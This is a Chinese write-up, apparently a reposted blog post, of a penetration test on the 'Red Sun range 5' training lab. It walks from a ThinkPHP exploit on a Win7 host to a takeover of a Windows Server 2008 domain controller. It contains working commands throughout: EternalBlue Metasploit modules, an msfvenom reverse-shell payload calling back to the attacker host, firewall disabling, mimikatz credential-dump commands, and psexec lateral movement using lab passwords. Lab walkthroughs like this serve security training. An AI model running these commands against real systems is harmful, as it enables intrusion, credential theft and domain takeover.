文章总结: 该文档记录了红日靶场5的完整渗透测试过程,从外网Web漏洞利用获取Win7主机权限,通过内网探测发现域控服务器,最终使用psexec横向移动接管WindowsServer2008域控。关键步骤包括ThinkPHP漏洞利用、蚁剑连接、内网代理搭建、永恒之蓝漏洞验证、Mimikatz凭证提取和Impacket工具横向移动。 综合评分: 78 文章分类: 渗透测试,内网渗透,红队,实战经验,漏洞分析
红日靶场5
原创
MyIsme MyIsme
YunSee-Sec
2026年6月28日 20:10 湖北
在小说阅读器读本章
去阅读
红日靶场5
一共两个靶机 win7 and win server 2008
| 服务器 | 网卡模式 | ip | | — | — | — | | Win 7 | 桥接(外网)/ Vmnet2仅主机 | 192.168.0.114 /192.168.138.136 | | Win server 2008 | Vmnet2仅主机 | 192.168.138.138 |
账户密码(win7有两个账户凭证)第一次登录需修改密码
| 服务器 | 账号 | 密码 | | — | — | — | | win7 | sun\heart | 123.com | | win7 | sun\Administrator | dc123.com | | win2008 | sun\admin | 2020.com |
win7 启动 phpstudy
开始信息收集 端口探测
强制 nmap 跳过 ICMP 存活检测,直接进行 TCP 端口扫描
nmap -sT --min-rate 10000 192.168.0.114 -p- -Pn
发现是ThinkPHP,也是通过无影扫到了11个漏洞
直接上工具,直接写入 getshell 通过蚁剑连接
权限还挺高,发现内网 192.168.138.0
这里上传 fscan + windows_x64_agent.exe 内网穿透隧道工具
打开代理软件,我这里使用的是 ProxyBridge.exe 进行 7777的端口转发设置
新版 fscan 是用 Go 1.21+ 编译的,而 Go 1.21+ 已经不支持 Windows 7 了
重新上传一个32位的fscan
可以看见 192.168.138.138 是台 win server 2008 的域控 并且还开放了 445端口
上线 msf 验证一下 是否真的存在 永恒之蓝漏洞
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.138.138
set proxies socks5:192.168.0.111:7777
run
直接上payload进行攻击
use exploit/windows/smb/ms17_010_eternalblue
set proxies socks5:192.168.0.111:7777
set RhOSTS 192.168.138.138
set lport 443
set payload windows/x64/meterpreter/bind_tcp
set AutoRunScript post/windows/manage/migrate
run
这里也是一直失败那么就不在浪费时间换一个方法,在windows 7 里通过 猕猴桃抓取 密码
在msfconsole 生成木马
msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.0.111 lport=5555 -f exe -o shell.exe
设置端口监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.111
set lport 5555
run
关闭一下防火墙
关闭所有防火墙配置文件(域/专用/公用)
netsh advfirewall set allprofiles state off
验证是否关闭成功
netsh advfirewall show allprofiles
查看一下 系统是否是 x64的,这里迁移一下进程,换成有system且为64位的程序
kiwi 模块默认以 32 位运行,直接用于 64 位系统会受限。在 64 位环境下,必须先使用 migrate 命令将 Meterpreter 迁移到 64 位进程中,然后再加载 kiwi 提取明文
migrate 492
creds_all:列举所有凭据
creds_kerberos:列举所有kerberos凭据
creds_msv:列举所有msv凭据
creds_ssp:列举所有ssp凭据
creds_tspkg:列举所有tspkg凭据
creds_wdigest:列举所有wdigest凭据
dcsync:通过DCSync检索用户帐户信息
dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:创建黄金票据
kerberos_ticket_list:列举kerberos票据
kerberos_ticket_purge:清除kerberos票据
kerberos_ticket_use:使用kerberos票据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密码
wifi_list:列出当前用户的wifi配置文件
wifi_list_shared:列出共享wifi配置文件/编码
尝试通过psexec横向移动
use exploit/windows/smb/psexec
set RHOSTS 192.168.138.138
set SMBDomain SUN
set SMBUser Administrator
set SMBPass Key-1122
set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.138.138
set proxies socks5:192.168.0.111:7777
set LPORT 4444
exploit
这里没注意用错模块失败了,换一下
还是失败,换个方法
编辑 kali的 /etc/proxychains4.conf 监听端口
使用 proxychains 配合 impacket-psexec
proxychains impacket-psexec SUN/Administrator:[email protected]
使用已获取的域管理员凭据 SUN/Administrator 通过 psexec 横向移动至域控 192.168.138.138 windows server 2008,成功获得域控主机 NT AUTHORITY\SYSTEM 权限,至此完成域控接管
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:YunSee-Sec MyIsme MyIsme《红日靶场5》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










评论